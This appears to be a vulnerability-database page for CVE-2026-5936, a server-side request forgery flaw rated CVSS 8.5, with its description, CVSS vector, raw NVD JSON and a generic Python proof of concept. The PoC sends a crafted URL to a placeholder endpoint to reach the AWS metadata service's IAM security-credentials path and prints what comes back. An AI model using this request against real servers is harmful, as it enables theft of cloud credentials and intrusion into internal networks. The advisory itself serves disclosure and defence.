Security Vulnerability Report
CVE-2026-5936 CVSS 8.5 HIGH

CVE-2026-5936

Published: 2026-04-13 07:16:51
Last Modified: 2026-04-13 15:01:44
Source: 14984358-7092-470d-8f34-ade47a7658a2

Description

An attacker can control a server-side HTTP request by supplying a crafted URL, causing the server to initiate requests to arbitrary destinations. This behavior may be exploited to probe internal network services, access otherwise unreachable endpoints (e.g., cloud metadata services), or bypass network access controls, potentially leading to sensitive information disclosure and further compromise of the internal environment.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Not disclosed in the information provided.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_ssrf(target_url, malicious_url):
    """
    PoC for CVE-2026-5936
    This script sends a crafted URL to the vulnerable endpoint to trigger an SSRF.
    """
    # Example payload targeting internal metadata service
    payload = {"url": malicious_url}
    try:
        print(f"[*] Sending request to {target_url} with payload: {malicious_url}")
        response = requests.post(target_url, data=payload, timeout=5)
        if response.status_code == 200:
            print("[+] Request successful!")
            print("[+] Response content:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual vulnerable endpoint
    target = "http://vulnerable-site.com/api/fetch"
    # Common internal metadata service IP (AWS)
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    exploit_ssrf(target, internal_target)
```

References

- https://www.foxit.com/support/security-bulletins.html (vendor security bulletins, from the record's reference list)

Weakness: CWE-918 (Server-Side Request Forgery)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-5936",
    "sourceIdentifier": "14984358-7092-470d-8f34-ade47a7658a2",
    "published": "2026-04-13T07:16:50.710",
    "lastModified": "2026-04-13T15:01:43.663",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An attacker can control a server-side HTTP request by supplying a crafted URL, causing the server to initiate requests to arbitrary destinations. This behavior may be exploited to probe internal network services, access otherwise unreachable endpoints (e.g., cloud metadata services), or bypass network access controls, potentially leading to sensitive information disclosure and further compromise of the internal environment."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "14984358-7092-470d-8f34-ade47a7658a2",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
            "baseScore": 8.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "14984358-7092-470d-8f34-ade47a7658a2",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.foxit.com/support/security-bulletins.html",
        "source": "14984358-7092-470d-8f34-ade47a7658a2"
      }
    ]
  }
}
```